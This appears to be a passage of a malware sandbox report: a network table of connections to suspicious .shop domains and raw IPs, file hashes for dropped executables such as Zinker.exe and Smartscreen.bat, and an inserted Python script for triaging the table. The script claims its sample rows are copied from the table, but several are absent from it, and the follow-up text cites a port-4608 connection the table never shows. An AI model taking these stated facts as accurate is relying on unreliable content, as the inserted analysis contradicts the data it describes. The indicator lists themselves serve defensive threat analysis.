US 8.8.8.8:53 averageaattractiionsl.shop udp
US 172.67.220.163:443 averageaattractiionsl.shop tcp
KR 43.155.163.53:24543 tcp
US 8.8.8.8:53 163.220.67.172.in-addr.arpa udp
US 8.8.8.8:53 femininiespywageg.shop udp
US 104.21.71.3:443 femininiespywageg.shop tcp
US 8.8.8.8:53 employhabragaomlsp.shop udp
US 8.8.8.8:53 3.71.21.104.in-addr.arpa udp
US 104.21.85.81:443 employhabragaomlsp.shop tcp
US 8.8.8.8:53 stalfbaclcalorieeis.shop udp
US 8.8.8.8:53 81.85.21.104.in-addr.arpa udp
US 104.21.3.197:443 stalfbaclcalorieeis.shop tcp
US 8.8.8.8:53 st.p.360safe.com udp
US 8.8.8.8:53 tr.p.360safe.com udp
US 8.8.8.8:53 iup.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
US 8.8.8.8:53 s.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 197.3.21.104.in-addr.arpa udp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
N/A 10.127.0.1:445 tcp
US 8.8.8.8:53 civilianurinedtsraov.shop udp
US 172.67.197.146:443 civilianurinedtsraov.shop tcp
DE 52.29.179.141:80 s.360safe.com tcp
N/A 10.127.0.1:139 tcp
US 8.8.8.8:53 146.197.67.172.in-addr.arpa udp
GB 85.192.56.26:80 85.192.56.26 tcp
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 26.56.192.85.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
RU 5.42.66.47:80 5.42.66.47 tcp
US 8.8.8.8:53 163.75.67.172.in-addr.arpa udp
RU 147.45.47.126:58709 tcp
US 8.8.8.8:53 126.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 checkforupdate.sytes.net udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 172.67.75.166:443 db-ip.com tcp
GB 85.192.56.26:80 85.192.56.26 tcp
DE 185.172.128.69:80 185.172.128.69 tcp
RU 5.42.66.10:80 5.42.66.10 tcp
TM 91.202.233.232:80 91.202.233.232 tcp
RU 5.42.66.10:80 5.42.66.10 tcp
DE 185.172.128.159:80 185.172.128.159 tcp
US 8.8.8.8:53 lop.foxesjoy.com udp
US 8.8.8.8:53 vk.com udp
US 8.8.8.8:53 monoblocked.com udp
BG 94.232.45.38:80 94.232.45.38 tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 172.67.159.232:80 lop.foxesjoy.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
US 172.67.159.232:80 lop.foxesjoy.com tcp
RU 45.130.41.108:80 monoblocked.com tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 8.8.8.8:53 10.66.42.5.in-addr.arpa udp
US 8.8.8.8:53 159.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 38.45.232.94.in-addr.arpa udp
US 8.8.8.8:53 232.233.202.91.in-addr.arpa udp
US 8.8.8.8:53 194.225.186.93.in-addr.arpa udp
US 172.67.159.232:80 lop.foxesjoy.com tcp
US 172.67.159.232:443 lop.foxesjoy.com tcp
RU 45.130.41.108:80 monoblocked.com tcp
US 8.8.8.8:53 www.facebook.com udp
RU 45.130.41.108:80 monoblocked.com tcp
US 8.8.8.8:53 www.youtube.com udp
GB 163.70.151.35:443 www.facebook.com tcp
GB 163.70.151.35:443 www.facebook.com tcp
GB 172.217.16.238:443 www.youtube.com tcp
GB 172.217.16.238:443 www.youtube.com tcp
RU 45.130.41.108:443 monoblocked.com tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
US 8.8.8.8:53 232.159.67.172.in-addr.arpa udp
US 8.8.8.8:53 108.41.130.45.in-addr.arpa udp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
DE 136.243.76.170:445 tcp
DE 136.243.76.170:139 tcp
US 8.8.8.8:53 f.123654987.xyz udp
RU 5.42.66.10:80 5.42.66.10 tcp
RU 93.186.225.194:443 vk.com tcp
US 8.8.8.8:53 sun6-21.userapi.com udp
NL 95.142.206.1:443 sun6-21.userapi.com tcp
US 8.8.8.8:53 170.101.63.23.in-addr.arpa udp
RU 93.186.225.194:443 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
US 8.8.8.8:53 sun6-22.userapi.com udp
NL 95.142.206.2:443 sun6-22.userapi.com tcp
RU 93.186.225.194:443 vk.com tcp
NL 95.142.206.2:443 sun6-22.userapi.com tcp
US 8.8.8.8:53 2.206.142.95.in-addr.arpa udp
US 8.8.8.8:53 1.206.142.95.in-addr.arpa udp
RU 5.42.66.10:80 5.42.66.10 tcp
RU 185.215.113.67:40960 tcp
US 8.8.8.8:53 67.113.215.185.in-addr.arpa udp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 detailbaconroollyws.shop udp
US 172.67.193.11:443 detailbaconroollyws.shop tcp
US 8.8.8.8:53 horsedwollfedrwos.shop udp
KR 221.143.49.222:80 221.143.49.222 tcp
US 104.21.74.118:443 horsedwollfedrwos.shop tcp
DE 136.243.76.170:135 tcp
US 8.8.8.8:53 patternapplauderw.shop udp
US 104.21.55.248:443 patternapplauderw.shop tcp
US 8.8.8.8:53 222.49.143.221.in-addr.arpa udp
US 8.8.8.8:53 248.55.21.104.in-addr.arpa udp
US 8.8.8.8:53 understanndtytonyguw.shop udp
US 104.21.22.94:443 understanndtytonyguw.shop tcp
US 8.8.8.8:53 94.22.21.104.in-addr.arpa udp
US 8.8.8.8:53 considerrycurrentyws.shop udp
DE 185.172.128.19:80 185.172.128.19 tcp
US 104.21.28.32:443 considerrycurrentyws.shop tcp
US 8.8.8.8:53 32.28.21.104.in-addr.arpa udp
US 8.8.8.8:53 free.360totalsecurity.com udp
US 8.8.8.8:53 messtimetabledkolvk.shop udp
RU 5.42.65.116:50500 tcp
US 172.67.158.30:443 messtimetabledkolvk.shop tcp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
US 8.8.8.8:53 116.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 30.158.67.172.in-addr.arpa udp
US 8.8.8.8:53 deprivedrinkyfaiir.shop udp
US 104.21.25.251:443 deprivedrinkyfaiir.shop tcp
US 8.8.8.8:53 251.25.21.104.in-addr.arpa udp
US 8.8.8.8:53 relaxtionflouwerwi.shop udp
US 172.67.190.237:443 relaxtionflouwerwi.shop tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 ocsp.crlocsp.cn udp
CN 101.198.2.196:80 ocsp.crlocsp.cn tcp
US 8.8.8.8:53 lubriaceites.com udp
US 212.1.210.79:443 lubriaceites.com tcp
US 8.8.8.8:53 79.210.1.212.in-addr.arpa udp
DE 136.243.76.170:135 tcp
US 8.8.8.8:53 crl.crlocsp.cn udp
CN 180.163.251.149:80 crl.crlocsp.cn tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
DE 49.13.194.118:80 49.13.194.118 tcp
US 8.8.8.8:53 checkforupdate.sytes.net udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 8.8.8.8:53 ocsp.crlocsp.cn udp
US 101.198.193.5:80 ocsp.crlocsp.cn tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 5.193.198.101.in-addr.arpa udp
US 8.8.8.8:53 175.21.199.152.in-addr.arpa udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 94.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
DE 136.243.76.170:445 tcp
RU 5.42.65.67:48396 tcp
US 8.8.8.8:53 st.p.360safe.com udp
US 8.8.8.8:53 tr.p.360safe.com udp
US 8.8.8.8:53 s.360safe.com udp
US 8.8.8.8:53 iup.360safe.com udp
DE 136.243.76.170:139 tcp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
US 8.8.8.8:53 67.65.42.5.in-addr.arpa udp
DE 52.29.179.141:80 s.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 int.down.360safe.com udp
US 8.8.8.8:53 sd.p.360safe.com udp
GB 99.86.249.221:80 sd.p.360safe.com tcp
CN 171.8.167.65:80 crl.crlocsp.cn tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
US 8.8.8.8:53 120.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 104.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 27.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 50.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 29.73.42.20.in-addr.arpa udp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 checkforupdate.sytes.net udp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 orion.ts.360.com udp
NL 82.145.215.156:443 orion.ts.360.com tcp
RU 91.215.85.135:80 91.215.85.135 tcp
US 8.8.8.8:53 ocsp.crlocsp.cn udp
CN 101.198.2.196:80 crl.crlocsp.cn tcp
US 101.198.193.5:80 ocsp.crlocsp.cn tcp
US 8.8.8.8:53 156.215.145.82.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
US 101.198.193.5:80 ocsp.crlocsp.cn tcp
US 8.8.8.8:53 beshomandotestbesnd.run.place udp
US 45.88.186.125:7000 beshomandotestbesnd.run.place tcp
US 8.8.8.8:53 125.186.88.45.in-addr.arpa udp
N/A 127.0.0.1:52407 tcp
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 250.117.210.54.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 api4.check-data.xyz udp
US 44.237.26.169:80 api4.check-data.xyz tcp
US 8.8.8.8:53 169.26.237.44.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 172.67.75.166:443 db-ip.com tcp
US 8.8.8.8:53 checkforupdate.sytes.net udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 52.182.143.212:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 212.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 dcxZfVrOkE.dcxZfVrOkE udp
US 52.182.143.212:443 nw-umwatson.events.data.microsoft.com tcp
US 52.182.143.212:443 nw-umwatson.events.data.microsoft.com tcp
US 52.182.143.212:443 nw-umwatson.events.data.microsoft.com tcp
US 52.182.143.212:443 nw-umwatson.events.data.microsoft.com tcp
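The table above mixes several kinds of traffic: sandbox reverse lookups (every .in-addr.arpa row), browser and telemetry traffic from Edge and Microsoft, update traffic from the 360 Total Security installer listed under Files, and the connections that belong to the loaders and stealers the report tags. Reading it by hand is error-prone, so the triage below is an added example, not part of the sandbox report: it parses the row format used here, drops reverse lookups, records forward DNS queries by name, and separates connections without a hostname or on ports other than 53, 80 and 443 from the rest. SAMPLE_ROWS are rows copied from the table; the row grammar, the "common port" heuristic and the bucket names are this example's assumptions, and nothing in it labels a destination as malicious on its own.

```python
"""Triage a sandbox "Network" table into a short list of reviewable indicators.

Added example, not part of the report. SAMPLE_ROWS are copied from the table
above; the row grammar and the common-port heuristic are this example's
assumptions, not the sandbox's own classification.
"""
import ipaddress
from typing import NamedTuple, Optional


class Row(NamedTuple):
    country: str
    ip: str
    port: int
    domain: Optional[str]
    proto: str


class Triage(NamedTuple):
    queried_domains: list[str]  # forward DNS lookups, deduplicated, in order seen
    hostless: list[str]         # connections with no hostname (or hostname == IP)
    odd_ports: list[str]        # connections to ports other than 53/80/443
    local: list[str]            # private, loopback and multicast destinations


COMMON_PORTS = {53, 80, 443}


def parse_row(line: str) -> Row:
    """Parse 'Country ip:port [domain] proto'; the domain column may be blank."""
    parts = line.split()
    if len(parts) not in (3, 4):
        raise ValueError(f"unexpected row: {line!r}")
    ip, _, port = parts[1].rpartition(":")
    domain = parts[2] if len(parts) == 4 else None
    return Row(parts[0], ip, int(port), domain, parts[-1].lower())


def _is_local(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return addr.is_private or addr.is_loopback or addr.is_multicast


def triage(lines: list[str]) -> Triage:
    """Bucket each row: DNS queries by name, everything else by endpoint."""
    out = Triage([], [], [], [])

    def add(bucket: list[str], item: str) -> None:
        if item not in bucket:
            bucket.append(item)

    for r in (parse_row(l) for l in lines if l.strip()):
        endpoint = f"{r.ip}:{r.port}/{r.proto}"
        if _is_local(r.ip):
            add(out.local, endpoint)
            continue
        if r.port == 53 and r.proto == "udp":
            # Sandboxes reverse-resolve every peer; the .in-addr.arpa rows are noise.
            if r.domain and not r.domain.endswith(".in-addr.arpa"):
                add(out.queried_domains, r.domain)
            continue
        if r.domain is None or r.domain == r.ip:
            add(out.hostless, endpoint)
            label = endpoint
        else:
            label = f"{endpoint} ({r.domain})"
        if r.port not in COMMON_PORTS:
            add(out.odd_ports, label)
    return out


# Rows copied from the Network table above (subset, including one duplicate).
SAMPLE_ROWS = [
    "US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp",
    "US 8.8.8.8:53 www.google.com udp",
    "GB 142.250.187.196:443 www.google.com tcp",
    "N/A 224.0.0.251:5353 udp",
    "RU 147.45.47.70:80 147.45.47.70 tcp",
    "CN 124.71.81.174:80 tcp",
    "SG 118.194.235.187:50500 tcp",
    "US 8.8.8.8:53 pepecasas123.net udp",
    "DE 195.10.205.90:4608 pepecasas123.net tcp",
    "N/A 10.127.0.1:445 tcp",
    "N/A 127.0.0.1:52407 tcp",
    "US 8.8.8.8:53 fragmentyperspowp.shop udp",
    "US 104.21.20.181:443 fragmentyperspowp.shop tcp",
    "IE 54.77.42.29:3478 st.p.360safe.com udp",
    "RU 185.215.113.67:40960 tcp",
    "US 45.88.186.125:7000 beshomandotestbesnd.run.place tcp",
    "SG 118.194.235.187:50500 tcp",
]

if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    for name, bucket in zip(Triage._fields, result):
        print(f"{name}:")
        for item in bucket:
            print(f"  {item}")
```

The hostless and odd-port buckets are where the report's tagged families show up in this run: raw-IP HTTP on port 80, bare TCP on 50500, 40960, 24543 and similar, and the 4608 and 7000 connections that do carry a hostname. The 3478/udp row to st.p.360safe.com lands in odd_ports as well, which is the point of the caveat: the buckets narrow the review, they do not replace it, and anything that survives still needs to be tied back to the process that opened it.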

Files

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 5aa17e67da5390729352ed4a11da1990
SHA1 e47a79137c6fa29f5d3e4610cdfefaa7beb4e71e
SHA256 5962a7fff106f931b3337fe04db08fa73b386e2e2675895b37950d906971054e
SHA512 62596db2b42b1becae325f078f55d53dfb15f69eb72c559222602d3a688fd2327c73c36a4fb88924e77e36e869dbbeb075352fb8111e6479c7509681a923b6ae

\??\pipe\crashpad_748_HGVHDWTQEVDKMGAJ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 707d86571e1fa66f657f146c22eac81c
SHA1 bcfdab90abbc393679a9498931395bb6b714d259
SHA256 8a1e2446ae46ea48bfa7d7d22a64527f238ef5a22d3cd6265e33c7e0299f9942
SHA512 ca55ba3264ba992e64be53c3d730c1836f673ef6aef4a5e901ea7805cc4c7a968b9347a4f833ad7fe9b522f5b0c366d0f27793b676282df92b1eeedba1a88602

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 3a3774f1e1dfa713e94367b732380ef6
SHA1 01e92aadf0615e89c79d28bdd428db2023ccc838
SHA256 6b5d732abd145f51f56b2a95ca65584c318b9378f1ad68b2491e95ba11113f07
SHA512 d3a316ab450fa137fe5a11b7dbe10b6e0da80c532e61eecec946ddd1712d973c9b1c35f9b374a43c91f2500fcc1575545b00d498429a5845c58c0e2c0bd9e034

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 e848fa92fe1d62b21d5253282567f648
SHA1 8b687fc65819f9f40269832a1a3c6f18b8444577
SHA256 747b6e0744a36b9b912019b6c32aac21574c2fe63c4864c28715f0ff7659b9e5
SHA512 df1e526d100ae701c16e519a1b51c74b26529452df72e5b108795870ff47efe1a7e50394118a87d0ddb7b8a3d87c37d560a9d5c54160f5ddd53b6e91b83582ab

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 780adb3243645be6504937c61b57d9b6
SHA1 16ee22c4c46750610c33ff836ab61438b6b668fb
SHA256 32eb6f8b7ea77b307041afcdd337bf54b91f17db9fb5b1d0f4213ed19e08b64c
SHA512 14121143d277885345fdce2a8c9dec8d7a3b9ca6f4a5ae7419ff775fd231ac9e0228f2d35a319b5b7740404ec1ab94de694374fa5d2a3c468c9cad9facb7090c

memory/336-177-0x00007FF9FB9B3000-0x00007FF9FB9B5000-memory.dmp

memory/336-176-0x00000000008E0000-0x00000000008E8000-memory.dmp

C:\Users\Admin\Desktop\a\volumeinfo.exe

MD5 e817cc929fbc651c5bdab9e8cca0d9d9
SHA1 4d73dc2afcde6a1dcf9417c0120252a2d8fd246f
SHA256 3a7327bd54ba0dfa36bbf0b9d0dc820984d6d0e0316cfa4045ab4c1e7e447282
SHA512 a9c1e547ef74c20e0a21dfc951463fb6883a23da4c323c96c5e64ac5793e774ceae898d4cf486e1bf1ea8fb69360610639a1046005fcdb9bd9f8463aec4a3e2f

memory/4564-189-0x00000000007E0000-0x0000000000A20000-memory.dmp

memory/4564-190-0x0000000005510000-0x000000000572C000-memory.dmp

memory/4564-191-0x0000000006860000-0x0000000006A7E000-memory.dmp

memory/4564-192-0x0000000007030000-0x00000000075D4000-memory.dmp

memory/4564-193-0x0000000006B20000-0x0000000006BB2000-memory.dmp

memory/4564-195-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-194-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-197-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-237-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-249-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-257-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-255-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-253-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-251-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-247-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-245-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-243-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-241-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-239-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-235-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-231-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-229-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-227-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-225-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-223-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-219-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-217-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-233-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-221-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-215-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-211-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-209-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-206-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-201-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-199-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-213-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-207-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-203-0x0000000006860000-0x0000000006A78000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 7c7c63fb99b7621550cb034d76666d24
SHA1 478b7034698beddd03bf0542e92ce3386041bf57
SHA256 e1c8a5f6c2944ca244e8477a534afc073aba8e8d562ac4ca2d303e5e6e5a4b15
SHA512 55932db96894bc05cf5f6d285d69604a79124bfcee199d390ca6b9c321dab93f3031a4f8a38d85f05b36d2699953f14f983cd6f518e5084f55e96b2bfec302a3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 085064d16437307715ff3d7b49379b25
SHA1 250d7675e776aa739b4384d8d3d25ebd2c159959
SHA256 a86cd2400324c09420654e509c063fd9f5a465e3a9562012c4667b03a681c189
SHA512 cd9f4e3d1c5d0f24d55a145e6f7bcc8af8547c31f9969ff6589776a98989ae94076267144cdfb09599ed8d223b2f776675d6614cf8907be431320002d31ebb46

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58fc7c.TMP

MD5 cc9c4a413c2dc4c34c7927e8b2a1dd7c
SHA1 3fde38f285123676c89d1a755f3b5b1ada4b94ec
SHA256 be096340b9f012551aeb6ce7b5e533f415122bc76c391dc43f10f1d1db8c7872
SHA512 07d74b5051ae28f3e9bdf0e0b3d0443d7889dd0e27843783988cdacdf81c11bca821aea86be8580ac2e827a07b542dd7a4961bf06fcffc4ff54ad9f2c6a95b26

memory/4564-5109-0x0000000006C30000-0x0000000006C88000-memory.dmp

memory/4564-5110-0x0000000006C90000-0x0000000006CDC000-memory.dmp

C:\Users\Admin\Desktop\a\Zinker.exe

MD5 b11913361b2d4c43c00c1969184050a8
SHA1 8358fa3426e4136e0873a32f49f5f367770bad0a
SHA256 de39bc2c5f18ae468501a573ee5cb9b22f2f608ec2fc51954b44d4549fac2a57
SHA512 2d25c021ddf59a10b63c56d85a550e7454767444472f3e40662dda1e1dddeef551202253cf9137bf4054ed832cd59c53b66aba6d42361f044fe4e7b06bef2026

C:\Users\Admin\Desktop\a\smartsoftsignew.exe

MD5 dd7b3d075cc843de37f20545669216ba
SHA1 355fcbf44674f0380153aa07a704c10c1043d499
SHA256 9fda36eb2fdc5a0befb6021bdc1bdbecb843da8ff68eea84d418eaf47bebfbdc
SHA512 dbca5bb9c8c4b7cd2be52c9932dae0a4718874570d9a82ea5307edf6e7904f17f7aa5e60f1b2c0efe53c0116c4f623f89df98b203237d27f18b2895fad29a8c6

C:\Users\Admin\Desktop\a\smartsoftsignew.exe

MD5 66a5a529386533e25316942993772042
SHA1 053d0d7f4cb6e3952e849f02bbfbdb4d39021146
SHA256 713a497c8da97c2082758fd31147539f408a72b62041c6c9ed77037021621e94
SHA512 9f4f69e9d1a3265311cd9f4bb9a254f157e1e0b7536466e88449f410f297d501d10448b170901206fff0ffde6d7e8a50b84e391fd62ff0f9355b506959cc336a

C:\Users\Admin\Desktop\a\ADServices.exe

MD5 0c2564813f2b9fc088cfb6938214d3cb
SHA1 cbb0bc2dfe83d38b9e4a8e47d182e6d7ee6a29b0
SHA256 1043faf46b5a19cbe10410e01725b38caf0db7f36b73c68e103ebca8da2d18d2
SHA512 06d4df2ed5d79c1d33ca06d977d936643c78139f484747bdfaac690b84f064620a6dc33014b0146acebce4e935688dc2a1445e7e2f830ec3b75e5e2dafa02ed1

C:\Users\Admin\AppData\Local\Temp\nsi1777.tmp\UAC.dll

MD5 adb29e6b186daa765dc750128649b63d
SHA1 160cbdc4cb0ac2c142d361df138c537aa7e708c9
SHA256 2f7f8fc05dc4fd0d5cda501b47e4433357e887bbfed7292c028d99c73b52dc08
SHA512 b28adcccf0c33660fecd6f95f28f11f793dc9988582187617b4c113fb4e6fdad4cf7694cd8c0300a477e63536456894d119741a940dda09b7df3ff0087a7eada

C:\Users\Admin\AppData\Local\Temp\nsi1777.tmp\nsExec.dll

MD5 132e6153717a7f9710dcea4536f364cd
SHA1 e39bc82c7602e6dd0797115c2bd12e872a5fb2ab
SHA256 d29afce2588d8dd7bb94c00ca91cac0e85b80ffa6b221f5ffcb83a2497228eb2
SHA512 9aeb0b3051ce07fb9f03dfee7cea4a5e423425e48cb538173bd2a167817f867a30bd4d27d07875f27ca00031745b24547030b7f146660b049fa717590f1c77e1

C:\Users\Admin\AppData\Local\Temp\putty\Smartscreen.bat

MD5 f6423b02fa9b2de5b162826b26c0dc56
SHA1 01e7e79e6018c629ca11bc30f15a1a3e6988773e
SHA256 59f52a56309ecb5c9c256a88db12a60403e5b0a8c0b8c013e7f6c9c5c395ff83
SHA512 5974e3a1bfe84719a2af614995f821d1c0a751b2ef2b39a3f6087c31dec609eb57d0824a28304e68365b75a0c7a3978aa28ed26c8f392976bd3337c1e8561459

memory/5504-5154-0x0000000002B90000-0x0000000002BC6000-memory.dmp

memory/5816-5155-0x000000001BBF0000-0x000000001C0BE000-memory.dmp

memory/5816-5156-0x000000001C170000-0x000000001C216000-memory.dmp

